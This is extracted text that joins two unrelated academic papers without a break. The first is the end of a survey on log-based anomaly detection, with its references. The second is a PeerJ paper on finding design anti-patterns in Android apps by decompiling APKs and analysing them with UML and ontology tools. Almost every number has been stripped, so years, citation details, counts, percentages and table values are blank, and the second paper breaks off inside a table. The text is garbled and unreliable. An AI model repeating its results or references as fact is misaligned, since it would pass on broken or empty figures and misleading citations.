hadoop production system, and the results showed that compared with the existing four algorithms for detecting abnormalities, this algorithm can effectively detect abnormal operation. since there are fewer abnormal points in reality, liu et al. [ ] proposed an anomaly detection algorithm based on isolation. the isolation tree created can quickly converge but requires sub-sampling to achieve high accuracy. international journal of advanced network, monitoring and controls volume , no. , c. density-based technology density-based technology considers objects in low-density areas as abnormal points. the density-based local outlier detection algorithm (lof) has high time complexity and is not suitable for outlier detection of large-scale data sets and high-dimensional data sets. wang jinghua et al. [ ] proposed a local outlier point detection algorithm nlof. li shaobo et al. [ ] proposed a density-based abnormal data detection algorithm gswclof. the algorithm introduces the concept of sliding time window and grid. in the sliding time window, the grid is used to subdivide the data, and the information entropy is used for all the data in the grid is pruned and filtered to eliminate most of the normal data, and finally the outlier factor is used to make a final judgment on the remaining data. wang qian et al. [ ] proposed a density-based detection algorithm, which introduced the local outlier factor (lof), and judged whether the data is abnormal based on the lof value of the data. the algorithm is only suitable for static data detection. once the amount of data fluctuates, it is necessary to recalculate the lof value of all data. the algorithm has poor adaptability and is not suitable for the detection process of dynamic data. pukelsheim et al. [ ] assumed that the data sample obeys a univariate gaussian distribution, and judged the test sample that is outside of the distance twice or three times the variance as abnormal. iv. challenges faced by log anomaly detection technology there are several obstacles from the time the system abnormality occurs to the successful detection of the abnormality:  the exception log is not recorded  the format of exception log records is not standardized  the exception log cannot be sent to the processing end in time  abnormal log sending is lost  the detection algorithm is not accurate enough any occurrence of one or more of the above conditions will result in failure of the anomaly detection result. a. real-time the purpose of anomaly detection is to find anomalies and find a corresponding method to float the anomaly, and the time delay from logging, to anomaly detection, to manual analysis, and to anomaly elimination is too long, which leads to anomalies that exist for too long. the losses were more serious. if real-time performance can be guaranteed, the efficiency of exception elimination will be greatly improved. b. detection accuracy anomaly detection has various factors that affect its accuracy, such as irregular log format, inappropriate algorithm, etc. these problems directly lead to a decrease in the accuracy of anomaly detection, which also determines that log anomaly detection cannot be completely separated from the intervention of technicians. even if the same benchmark data set is used in the literature for anomaly detection, most of them do not indicate the size or proportion of labeled data. even the size of training and test sets and evaluation indicators are different. different measurement combinations make the research results unable to compare with each other c. the versatility of detection algorithms at present, there are many anomaly detection algorithms at home and abroad, such as: isolation forest, one-class svm, robust covariance, k-means, principal component analysis, -ε, etc. these algorithms have their own advantages and disadvantages and are not suitable for all anomaly detection. however, due to its unstructured and non-identical characteristics of logs, a specific algorithm is needed for a specific log, or a specific international journal of advanced network, monitoring and controls volume , no. , algorithm is improved to achieve a higher detection rate. the "localization" of the algorithm also requires specialized technical personnel to operate, which increases the cost of detection. d. tag data in the log data, there is a large amount of data, and there are very few abnormal data. it is very difficult to mark a small amount of abnormal data in a large amount of data. there is no such publicly marked data as the experimental basis, so anomaly detection encountered great difficulties. v. research direction of anomaly detection based on the current research status of anomaly detection technology and the above problems, the challenges and future research directions of anomaly detection are summarized as follows: traffic data often have high characteristic dimensions, and the euclidean distance in the sampling method can not measure the spatial distribution of the samples very well. the data distribution environment of supervised learning and semi supervised learning are different. under unbalanced data, most of the existing semi supervised methods apply the traditional methods to semi supervised learning. therefore, the traditional methods to solve the imbalance problem are not necessarily suitable for semi supervised learning and need further research. although the research on data imbalance has achieved good results in the field of network security, there are very few researches on the imbalance problem in semi supervised learning. most of the semi supervised methods applied in the field of anomaly detection use ensemble learning to solve the class imbalance. in the future, we can solve the problem of anomaly detection by combining the latest achievements in the field of data imbalance under semi supervision. at present, many network traffic feature selection and extraction are limited to one dimensional features or simple combination of multi-dimensional features, while traffic anomalies usually show in multi-dimensional features. how to effectively fuse multi-dimensional features, learn data flow features from multiple perspectives, and use a small amount of labeled data for semi supervised integration algorithm synthesis results to reduce information loss is a challenging research topic. semi supervised dimensionality reduction is a feasible method in the field of anomaly detection. how to find a more effective way to deal with high-dimensional sparse samples and continuous variables and further improve the real-time performance of detection model is of great significance. the learning effect of the combination of active learning and semi supervised learning strategy is better than that of single method. the combination of semi supervised learning and active learning can actively find effective supervision information. through effective supervision information, unlabeled sample data can be used better, thus improving the accuracy of the model and solving speed. however, the research on the combination of semi supervised learning and active learning is rare, and there is a large space for improvement. incremental semi supervised anomaly detection is more in line with the actual anomaly detection. it makes full use of the data results processed before in the training process. it should have more in-depth research in the field of network security. in the future, we can consider introducing the incremental algorithm of natural language technology into specific anomaly detection. semi supervised clustering algorithm uses the traditional clustering algorithm to introduce the supervised information to complete the semi supervised learning, so it can also expand the semi supervised clustering algorithm such as density international journal of advanced network, monitoring and controls volume , no. , clustering and spectral clustering. in addition, some traffic data are high-dimensional and sparse. however, most of the existing clustering algorithms are not suitable for processing high-dimensional sparse data. in future research, it is necessary to make further discussion. in general, semi supervised learning can help improve performance by using unlabeled data, especially when the number of labeled data is limited. however, in some cases, the selection of unreliable unlabeled data may mislead the formation of classification boundaries and eventually lead to the degradation of semi supervised learning performance. therefore, how to use unlabeled data safely is a research focus in the future. it can combine multiple semi supervised anomaly detection methods and technologies to achieve more efficient network data detection and obtain more accurate prediction results. in addition, in semi supervised anomaly detection, it is a challenging research topic to minimize the additional impact on the network. vi. conclusion machine learning faces many challenges in the field of abnormal traffic detection. the biggest difficulty is the lack of label data. in practice, only a limited number of tagged data is available, while most of the data is unmarked. in addition, although there are a large number of normal access data, there are few abnormal traffic samples and various attack forms, which make it difficult to learn and train the model. semi supervised learning is an effective solution, which can make use of both unlabeled data and labeled data, which can alleviate this problem. for anomaly detection based on log analysis, domestic and foreign countries have made certain progress and achieved various results. various algorithms such as template matching, automatic rule generation, outlier analysis, and statistical data have certain effects, which are of great significance to network security and intelligent operation and maintenance. future research will continue to focus on real-time performance to ensure that abnormalities can be detected as quickly as possible. improve detection accuracy, minimize manual intervention or cancel manual intervention. study the versatility of the algorithm, so that an algorithm can adapt to log analysis in different environments as much as possible. references [ ] yuan d, park s, huang p, liu y, lee mm, tang x, zhou y, savage s. be conservative: enhancing failure diagnosis with proactive logging. in: proc. of the th symp. on operating systems design and implementation (osdi). . ~ . [ ] yuan d, park s, zhou y. characterizing logging practices in open-source software. in: proc. of the int'l conf. on software engineering. . ~ . [doi: . /icse. . ]. [ ] peng dong. intelligent operation and maintenance: building a large-scale distributed aiops system from zero. electronic industry press, . isbn - - - - p -p . [ ] varun chandola, arindam banerjee, vipin kumar. anomaly detection: a survey[j]. acm computing surveys, , ( ). [ ] davis j j, clark a j. data preprocessing for anomaly based network intrusion detection: a review[j]. computers & security, , ( - ): - . [ ] q. lin, h. zhang, j. lou, y. zhang and x. chen, "log clustering based problem identification for online service systems," ieee/acm th international conference on software engineering companion (icse-c ), austin, tx, , pp. - . [ ] pecchia a, cotroneo d, kalbarczyk z, et al. improving log-based field failure data analysis of multi-node computing systems[c]. ieee, . [ ] tambe r, karabatis g, janeja v p. context aware discovery in web data through anomaly detection[j]. international journal of web engineering and technology, , ( ): . [ ] wang xiaodong, zhao yining, xiao haili, chi xuebin, wang xiaoning. detection method of abnormal log flow pattern in multi-node system [j/ol]. journal of software: - [ - - ]. [ ] wang zhiyuan, ren chongguang, chen rong, qin li. anomaly detection technology based on log template[j]. intelligent computers and applications, , ( ): - + . [ ] son s, gil ms, moon ys. [ieee ieee international conference on big data and smart computing (bigcomp)-jeju island, south korea ( . . - . . )] ieee international conference on big data and smart computing (bigcomp)-anomaly detection for big log data using a hadoop ecosystem[j]. : - . [ ] fu, q., lou, jg, wang, y., & li, j. ( ). execution anomaly detection in distributed systems through unstructured log analysis. in proceedings of the ninth ieee international conference on data mining, icdm ' , (pp. – ). washington, dc: ieee computer society. doi: . /icdm. . . international journal of advanced network, monitoring and controls volume , no. , [ ] xu w, et al. large-scale system problems detection by mining console logs[j]. proceedings of the acm sigops symposium on operating systems principles big sky mt, : . [ ] ilenia fronza, alberto sillitti, giancarlo succi, mikko terho, jelena vlasenko. failure prediction based on log files using random indexing and support vector machines[j]. journal of systems and software, , ( ): - . [ ] peng w, li t, ma s. mining logs files for data-driven system management. acm sigkdd explorations newsletter, , ( ): - . [ ] zhang luqing. web attack data mining algorithm based on outlier anomaly[j]. ship electronic engineering, , ( ): - . [ ] breier j, jana branišová. a dynamic rule creation based anomaly detection method for identifying security breaches in log records[j]. wireless personal communications, , ( ): - . [ ] zhang zhongping, liang yongxin. algorithm for mining outliers in flow data based on anti-k nearest neighbors[j]. computer engineering, , ( ): - . [ ] grace, l., maheswari, v., & nagamalai, d. ( ). web log data analysis and mining. in n. meghanathan, b. kaushik, & d. nagamalai (eds.), advanced computing, communications in computer and information science (vol. , pp. – ). berlin: springer. [ ] liang bao, qian li, peiyao lu, jie lu, tongxiao ruan, ke zhang. ( ). execution anomaly detection in large-scale systems through console log analysis. the journal of systems & software ( ) – . [ ] liu f t, ting k m, zhou z h. isolation-based anomaly detection[j]. acm transactions on knowledge discovery from data, , ( ): - . [ ] wang jinghua, zhao xinxiang, zhang guoyan, liu jianyin. nlof: a new density-based local outlier detection algorithm [j]. computer science, , ( ): - . [ ] li shaobo, meng wei, wei jinglei. density-based abnormal data detection algorithm gswclof[j]. computer engineering and applications, , ( ): - . [ ] wang qian, liu shuzhi. improvement of local outlier data mining method based on density [j]. application research of computers, , ( ): - + . [ ] pukelsheim f. the three sigma rule[j]. the american statistician, , ( ): - . reverse engineering approach for improving the quality of mobile applications reverse engineering approach for improving the quality of mobile applications eman k. elsayed , kamal a. eldahshan , enas e. el-sharawy , and naglaa e. ghannam department of mathematical and computer science, faculty of science, al-azhar university, (girls branch), cairo, egypt department of mathematical and computer science, faculty of science, al-azhar university, cairo, egypt computer department, college of science and humanities in jubail, imam abdulrahman bin faisal university, kingdom of saudi arabia abstract background: portable-devices applications (android applications) are becoming complex software systems that must be developed quickly and continuously evolved to fit new user requirements and execution contexts. applications must be produced rapidly and advance persistently in order to fit new client requirements and execution settings. however, catering to these imperatives may bring about poor outline decisions on design choices, known as anti-patterns, which may possibly corrupt programming quality and execution. thus, the automatic detection of anti-patterns is a vital process that facilitates both maintenance and evolution tasks. additionally, it guides developers to refactor their applications and consequently enhance their quality. methods: we proposed a general method to detect mobile applications’ anti-patterns that can detect both semantic and structural design anti-patterns. the proposed method is via reverse-engineering and ontology by using a uml modeling environment, an owl ontology-based platform and ontology-driven conceptual modeling. we present and test a new method that generates the owl ontology of mobile applications and analyzes the relationships among object-oriented anti-patterns and offer methods to resolve the anti-patterns by detecting and treating different design’s semantic and structural anti-patterns that occurred in analyzing of mobile applications. we choose mobile applications randomly. selecting a browser is not a criterion in this method because the proposed method is applied on a design level. we demonstrate a semantic integration method to reduce the incidence of anti-patterns using the ontology merging on mobile applications. results: the proposed method detected semantic and structural design anti-patterns which have appeared , times in a random sample of mobile applications. the proposed method introduced a new classification of the anti-patterns divided into four groups. “the anti-patterns in the class group” is the most group that has the maximum occurrences of anti-patterns and “the anti-patterns in the operation group” is the smallest one that has the minimum occurrences of the anti-patterns which are detected by the proposed method. the results also showed the correlation between the selected tools which we used as modelio, the protégé platform, and the oled editor of the ontouml. the results showed that there was a high positive relation between modelio and protégé which implies that the combination between both increases the accuracy level of the detection of anti-patterns. in the evaluation and how to cite this article elsayed ek, eldahshan ka, el-sharawy ee, ghannam ne. . reverse engineering approach for improving the quality of mobile applications. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted july published august corresponding author naglaa e. ghannam, naglaasaeed@azhar.edu.eg academic editor marta cimitile additional information and declarations can be found on page doi . /peerj-cs. copyright elsayed et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:naglaasaeed@�azhar.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ analyzing the suitable integration method, we applied the different methods on homogeneous mobile applications and found that using ontology increased the detection percentage approximately by . % in addition to guaranteed consistency. subjects software engineering keywords mobile applications, reverse engineering, uml, ontouml, anti-patterns, ontology engineering introduction mobile applications take center stage in our lives today. we utilize them anywhere, at any time and for everything. we use them to peruse websites, shop, search for everything we need and for basic administration such as banking. for the importance of mobile applications, their reliability and quality are critical. like any other applications, the initial design of mobile applications is affected by bug-settling and the introduction of new properties, which change the initial design; this can occasionally affect the quality of design (parnas, ). this aspect is known as software degeneration, which can exist in the form of design flaws or anti-patterns (eick et al., ). one of the most important factors in the development of software systems is improving software quality. the success of software design depends on the availability of quality elements such as maintainability, manageability, testability, and performance. these elements are adversely affected by anti-patterns (afjehei, chen & tsantalis, ; yamashita & moonen, ). anti-patterns are bad practice in software design. the automatic detection of anti-patterns is a good way to support maintenance, uncomplicate evolution tasks, and improve usability. in addition to the general advantages of detecting anti-patterns, we think that detecting anti-patterns provides developers with a way to ensure that the detected anti-patterns will not be repeated in applications revisions. also, detecting anti-patterns may improve both operational characteristics and user experience. we note that there are many other approaches interested in detecting anti-patterns in the code level as introduced by morales et al. ( ) and alharbi et al. ( ). however, it has been noted that anti-pattern detection at the design level reduces many code anti-patterns and is more general. according to raja ( ), engineering is the process of designing, manufacturing, assembling, and maintaining products and systems. engineering has two types, forward engineering, and reverse engineering (re) as presented by raja ( ). chikofsky & cross ( ) defined re as the process of analyzing software systems to identify the components of the systems and the interrelationships between them and presenting the systems in other forms or at a higher level of abstraction. the term re according to our approach, refers to the process of generating uml diagrams followed by generating owl ontologies of mobile applications through importing and analyzing the bytecode. generally, we can use ontology re-engineering for direct incorporation as an ontology development method (obrst et al., ) by allowing the designer to analyze the common components dependence. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ designing a pattern of mobile application remains an ongoing research challenge. the proposed approach aims to detect structural and semantic anti-patterns in the design of mobile applications as well as to show which method is better for the integration of applications. motivated by the research mentioned above, the major contributions of this paper are sixfold: � presenting a new method for generating owl ontology of mobile applications. � presenting a general method for enhancing the design of a pattern of a mobile application. � illustrating how the proposed method can detect both structural and semantic anti-patterns in the design of mobile applications. � describing how we evaluate the proposed method in mobile applications. showing how it detects and treats designs’ semantic and structural anti-patterns that appeared , times. � showing how semantic integration among mobile applications decreases the occurrences of anti-patterns in the generated mobile application pattern. � analyzing the relationships among the object-oriented anti-patterns and the detection tools. in the rest of the paper, we subsequently present the related work. next, we present some basic definitions, and the details of the proposed approach is described. after that, the empirical validations of the proposed method are presented, followed by the results and discussion. finally, the concluding remarks are given, along with scope for future work. related works many empirical studies have demonstrated the negative impact of anti-patterns on change-proneness, fault-proneness, and energy efficiency (romano et al., ; khomh et al., ; morales et al., ). in addition to that, hecht et al. ( a), chatzigeorgiou & manakos ( ), hecht, moha & rouvoy ( ) observed an improvement in the user interface and memory performance of mobile apps when correcting android anti-patterns. they found that anti-patterns were prevalent in the evolution of mobile applications. they also confirmed that anti-patterns tend to remain in systems through several releases unless a major change is performed on the system. many efficient approaches have been proposed in the literature to detect mobile applications’ anti-patterns. some researchers concentrate on ensuring that the soft is free of contradictions which are called consistency. alharbi et al. ( ) detected the anti-patterns related to inconsistency in mobile applications that were only related to camera permissions and similarities. joorabchi, ali & mesbah ( ) detected the anti-patterns related to inconsistency in mobile applications using a tool called checkcamp that was able to detect anti-patterns related to inconsistencies between application versions. hecht et al. ( b) used the paprika approach to detect some popular object-oriented anti-patterns in elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the code of mobile applications using threshold technique. linares-vásquez et al. ( ) detected object oriented (oo) anti-patterns in , java mobile applications by using dÉcor. this study focused on the relationship between smell anti-patterns and application domain. also, they showed that the presence of anti-patterns negatively impacts software quality metrics; in particular, metrics related to fault-proneness. yus & pappachan ( ) analyzed more than semantic web papers, and they found that more than mobile applications are semantic mobile applications. they showed that the existence of semantic helps in better local storage and battery consumption. the detection of semantic anti-patterns will improve the quality of mobile applications. palomba et al. ( ) proposed an automated tool called a doctor. this tool can identify android code smells. they made an empirical study conducted on the source code of android applications and revealed that the proposed tool reached % precision and % recall. a doctor detected almost all the code smell instances existing in android applications. hecht et al. ( b) introduced the paprika tool to monitor the evolution of mobile application quality based on anti-patterns. they detected the common anti-patterns in the code of the analyzed applications. they detected seven anti-patterns; three of them were oo anti-patterns and four are mobile applications anti-patterns. reverse engineering is the process of analyzing software systems to identify the components of the systems and the interrelationships between them and presenting the systems in other forms or at a higher level of abstraction (chikofsky & cross, ). in this paper, we used re to transfer code level to design level for detecting mobile applications’ anti-patterns. re techniques are important for understanding the construction of the user interface and algorithms of applications. additionally, we can know all the properties of the application, its activities, and permissions and can read the mainfest.xml of the applications. re techniques have been used with mobile applications for many purposes not just for detecting anti-patterns. song et al. ( ) used re for improving the security of android applications. while zhou et al. ( ) used the re technique to detect logging classes and to remove logging calls and unnecessary instructions. also, arnatovich et al. ( ) used re to perform program analysis on a textual form of the executable source and to represent it with an intermediate language (il). this il has been introduced to represent applications executable dalvik (dex) bytecode in a human-readable form. ontology and software engineering according to the ieee standard glossary of software engineering terminology-description ( ), software engineering is defined as “the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software.” also, from the knowledge engineering community perspective, computational ontology is defined as “explicit specifications of a conceptualization.” according to calero, ruiz & piattini ( ), happel & seedorf ( ), the importance of sharing knowledge to move the software to more advanced levels require an explicit definition to help machines interpret this knowledge. happel & seedorf ( ) decided that ontology is the most promising way to address software engineering problems. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ elsayed et al. ( ) proofed the similarities in infrastructures between uml and ontology components. they proposed checking some uml quality features using ontology and ontology reasoning services to check consistency and redundancies over uml models. this would lead to a strong relationship between software design and ontology development. in software engineering, ontologies have a wide range of applications, including model transformations, cloud security engineering, decision support, search, and semantic integration (kappel et al., ; aljawarneh, alawneh & jaradat, ; maurice et al., ; bartussek et al., ; de giacomo et al., ). semantic integration is the process of merging the semantic contents of multiple ontologies. the integration may be between applications that have the same domain or have different domains to take the properties of both applications. we make ontology integration for many reasons: to reuse the existing semantic content of applications, to reduce effort and cost, to improve the quality of the source content or the content itself, and to fulfill user requirements that the original ontology does not satisfy. proposed method in this section, we introduce the key components of the proposed method for analyzing the design of mobile applications to detect design anti-patterns, and for making semantic integration between mobile applications via ontology reengineering. the proposed method for anti-pattern detection consists of three main phases and is summarized in fig. . also, there is an optional phase called the integration phase. . the first phase presents the process of reformatting the mobile application to java format. . the second phase presents the reverse-engineering process. in this phase, we used re to reverse the java code of mobile applications and generating uml class diagram models. additionally, many design anti-patterns were detected. the presented reverse approach is accurate enough to analysis the information that we need about apk to reverse uml models of the applications. . the third phase completes the anti-patterns detection and correction processes. this phase converts uml mobile application model to owl ontology, then analyzes the relationships among object-oriented anti-patterns and offers methods to resolve the anti-patterns related to semantic and inconsistency. after that, we can regenerate the java code of mobile applications. the developer can ensure that anti-patterns in existing applications will not be repeated in application revisions and may improve both operational characteristics and user experience. . the integration phase is an optional fourth phase. in this phase, we integrate two applications by merging the owl ontologies of both applications. from these two ontologies, we will yield one integrated application for doing both services with minimum anti-patterns. we will present in detail the rationale provided for why this integration is needed as an optional phase if we need. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the integration of mobile applications the integration process is most for the inclusion of new skill sets for applications such as iot or monitoring applications or potentially voice-activation integration into an existing application. but, here we were interested in presenting a new manner for homogenous integration to combine the advantages of two mobile applications in a new pattern. in this section, we provided a rationale for why this integration is needed and presenting the integration as an extra phase if we need where the other detection phases do not change. patterns are advanced methods to develop any mobile applications. the integration or merging of mobile applications is a good step in mobile application development. the advantage of the integration of mobile applications is in responding to the puzzling selection of the appropriate application from a set of applications. this will achieve the same objective if each application has a different advantage and the developer wants to start to improve pattern combines all advantage without anti-patterns. to clear our idea, we choose two homogenous applications: viber and whatsapp. they are the most popular messaging and voice over ip applications. both viber and whatsapp are similar in services, features, security, and cost. there is plenty to like about both applications: they produce the same services as end-to-end encryption, support groups and video calls, support on any operating system, allow transmission of documents or multimedia, and work over g, g, and wi-fi. well, both are fantastic in their way, but which one is better for the developer as a pattern for refinement? we found that viber had been offering both video and voice calling for a far longer time than whatsapp and has a hidden chat feature. also, viber permits the user to play a list of games with other viber contacts. however, whatsapp is popular and easy to use. we can make the integration of both applications and take the best skills of both. we imagine that when producing a new application we can directly integrate it to the old one without replacing. figure the proposed method phases. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the case of heterogonous integration applications, the developer, for example, may want to develop a new health care hybrid application. from the website “free apps for me” (https://freeappsforme.com/), a developer can find at least seven applications for measuring blood pressure. all of them are free and available on a different platform. there are also at least diabetes applications. when a developer merge two applications (one for measuring blood pressure as the “smart blood pressure” application and the other for controlling diabetes as the “onetouch reveal” application), the integration phase will yield one integrated application for doing both services, with minimum anti-patterns. then the developer can add the new relations between these disease controller without conflict. the integration allows the combination of the skills of both applications to get new mobile application pattern. these two examples of two types of integration answer the question of why we need to integrate mobile applications. we suggest using the integration pattern, then comparing between the two integration proposed methods to select the suitable one. the first integration method is for after decompiling the apk of the applications. we use re methodology for generating one uml class diagram of both applications. then we start the detection of the anti-patterns process for the integrated application (fig. ). the second integration method is through merging the owl ontologies of both applications using the prompt plugin in protégé as the ontology editor as introduced in fig. . the implementation in this section, we propose the implementation of the proposed detection method and determine which packages are suitable for each phase. � the first phase: apk files are zip files used for the installation of mobile apps. we used the unzip utility for extracting the files stored inside the apk. it contained the androidmanifest.xml, classes.dex containing the java classes we used in the reverse process, and resources.arsc containing the meta-information. we de-compiled the apk files using apktool or android de-compiler. android de-compiler is a script that combines different tools to successfully de-compile any (apk) to its java source code figure merging uml class diagrams of the mobile apps. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://freeappsforme.com/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and resources. finally, we used a java de-compiler tool such as jd-gui to de-compile the java classes. jd-gui is a standalone graphical utility that displays the java code of “. class” files. the input of the first phase was the apk file of the mobile application and the output was the java classes of the apk application. jd-gui is accurately enough to generate the java code that we use to reverse the models of the applications. � the second phase: we used a re approach for generating the uml class diagram models of the mobile applications. elsayed, el-dahshan & ghannam ( ) compared between uml tools, the authors found that modelio . is a suitable tool for modeling and detecting uml design anti-patterns. the uml class diagram was generated by reversing the java binaries of the mobile app. detecting anti-patterns in the uml model is the first step in the detection process. the input of the second phase was classes.java of the app and the output was the uml class diagram model of the app with a list of the detected anti-patterns. � the third phase: by converting the model to xml format, we could generate it as an ontouml model in oled, which is the editor of ontouml for detecting semantic anti-patterns. ontouml is a pattern-based and ontologically well-founded version of uml. its meta-model has been designed in compliance with the ontological distinctions of a well-grounded theory named the unified foundational ontology. oled editor also supports the transformation of the oled file to the owl ontology of the mobile app, allowing the detection of inconsistency and semantic anti-patterns using the “reasoner” ontology in protégé. protégé is the broad ontology editor commonly used by many users. the integration phase (the fourth optional phase): we propose two methods for integrating mobile applications. the first method is merging the uml models at the second phase when we reverse the models from java code and then completing the detection phases over the integrated application. the second method is merging the owl ontologies of the both applications using a prompt (protégé plugin) to generate one owl ontology pattern. figure shows the both applications “viber and whatsapp” components before merging. figure shows the integrated application; fig. has three tabs (classes, slots, and instances) which are the components of the ontology. every tab shows the components of its type after integration. finally, we used “reasoner in protégé” to check the consistency after integration. empirical validations we assessed our approach by reporting the results we obtained for the detection of anti-patterns on a random sample of popular android applications downloaded randomly from the apk mirror. applications under analysis table presents the downloaded applications from the apk mirror. we selected some popular applications such as youtube, whatsapp, play store, and twitter. the size of the applications included the resources of the application, as well as images and data files elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (table ). the research study included the identification and repetition of anti-patterns across different domains and different sizes. case study on “avast android mobile security” to explain the proposed method, we presented a snapshot of it in a different case study “avast android mobile security.” the case study is one of the mobile applications that figure “viber and whatsapp” ontologies before integration in protégé. full-size doi: . /peerj-cs. /fig- figure owl ontology merging. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is proposed in this article for the evaluation of the proposed method. the case study is downloaded from the apkmirror. the “avast android mobile security” secures the devices against phishing attacks from emails, phone calls, infected websites, or sms messages. also, it has many other features as antivirus engine, app lock, call blocker, anti-theft, photo vault, virtual private network, and power save. the reason for choosing “the avast android mobile security” application as a case study is that it has the maximum number of the detected anti-patterns using the proposed method. using the reverse methodology, we generated the uml class diagram model of the java classes in modelio. the model includes the classes, subclasses, class attributes, operations, and the associations between them (fig. ). after generating the uml class diagram of the application in modelio, we detected repeated anti-patterns in the “avast android mobile security.” the anti-patterns are shown in fig. . the number and the location of the anti-patterns were determined. figure the result slots of the ontology after integration in protégé. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ there were detected anti-patterns (without repeat): “namespaces have the same name,” “namespace is leaf and is derived,” “namespace is leaf and is abstract,” “generalization between two incompatible elements,” “a public association between two classifiers one of them is public and the other is privet,” “classifier has several operations with the same signature,” “classifier has attributes with the same name,” “the status of an attribute is abstract and class,” “a destructor has two parameters,” and finally “multiplicitymin must be inferior to multiplicitymax.” figure shows a sample of them. to convert the uml model to xml format, we converted it into an enterprise architecture file then converted it to an oled file. in the “avast android mobile security” oled file, we validated the model for detecting the anti-patterns. the detected table the description of the mobile apps under analysis. mobile application name size (mb) downloads description of use test dpc . . . , , libraries and demo avast . . security . , antivirus engine and mobile security free-calls-messages . , communication beautiful gallery . . photography play store . . . , google play store wall paper . . . , personalization oasis-feng/island . . privacy protection and parallel running netflix- - - -build . , entertainment remainder . . . , remainder sound-picker . . . , samsung sound picker air-command . . . , air command lifesum-healthy-lifestyle . , diet plan, food diary, macro calculator, calorie counter, and healthy recipes background-defocus . . . , photography gasbuddy-find-cheap-gas . travel and local soundcloud-music-audio. . . , music and audio network-monitor-mini . . . monitor the upload and download speed per second casper android . . . . , messaging app snapchat line . . . communication diagnosises . medical viber . . . . , communication whatsapp . . . , communication firefox . . , communication blue- email and calendar . . . . . productivity google camera . . . . , photography youtube . . , video players true caller . . . communication samsung gallery . . . , photography twitter . . . news and magazines chrome browser . . . , communication elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ anti-patterns in the different apps were: association cycle anti-patterns, binary relations with overlapping ends anti-patterns, imprecise abstraction anti-patterns, and relation composition anti-patterns. after anti-patterns detection using ontouml editor, oled supports the transformation of oled file to the owl ontology. we checked the inconsistency anti-patterns using the reasoner of the ontology editor (protégé). the reasoner detected the anti-patterns figure the generated uml class diagram of the case study. full-size doi: . /peerj-cs. /fig- figure modelio anti-patterns. full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related to inconsistency as (similar name, multiplicity constraints, and cyclic inheritance). using the reasoner of ontology over the case study, we detected the anti-patterns in the classes that have the anti-patterns namespaces have the same name, classifier has several operations with the same signature, classifier has attributes with the same name, and multiplicitymin must be inferior to multiplicitymax, which we detected after generating the class diagram in modelio, and detected the anti-pattern (association cyclic) which was detected via oled. the treatment or correction of the detected anti-patterns is classified into the following: � modelio presents the solution as a list of recommendation which developer can do it manually. in this case study, table presents the anti-patterns and the method of correction. � oled presents automatic solutions to correct the anti-patterns which we list in table . � reasoner in protégé presents all inconsistency anti-patterns where as reasoner gives just the location of the inconsistent classes as in fig. . results and discussion we applied our proposed method on a sample of android applications, which we downloaded from the apk mirror. the results present the detected anti-patterns in the mobile applications and the relation between the different types of anti-patterns. the proposed method detected anti-patterns. the total number of anti-patterns that appeared in the applications was , anti-patterns. we classified the anti-patterns according to their existence in the uml class diagram components. the occurrences of the anti-patterns are given in table . every group has the anti-patterns that were detected in figure the anti-pattern “classifier has several operations with the same signature.” full-size doi: . /peerj-cs. /fig- elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it. for example, the group “anti-patterns in operations” presents all anti-patterns that were detected in the operations using the three tools. table shows the detected anti-patterns in each application using the proposed method and the total number of anti-patterns in the mobile applications. we found that the “anti-patterns in the class” group is the most commonly detected anti-pattern in android applications. the “anti-patterns in operation” is the least commonly appeared anti-pattern (fig. ). we measured the relations between anti-patterns groups using correlation coefficient. correlation coefficient is a statistical measure of the degree to which changing the value of one variable predict changing to the value of the other. a positive correlation indicates that the extent to which those variables increase or decrease in parallel. while a negative correlation indicates the extent to which one variable increases as the other table ontouml anti-patterns and the correction way. the anti-pattern the method of correction association cycle chang the cycle to be closed or open cycle binary relation with overlapping ends declare the relation as anti-reflexive, asymmetric, and anti-transitive imprecise abstraction add domain-specific constraints to refer to which subtypes of the association end to be an instance of the other end may be related relation composition add ocl constraints which guarantee that if there is a relation between two types and one of them has subtypes, there must be constraints says that the subtypes are also in a relation with the other type relation specialization add constraints on the relation between the type and the super-type, declaring that the type is to be either a specialization, a subset, a redefinition or disjoint with relation 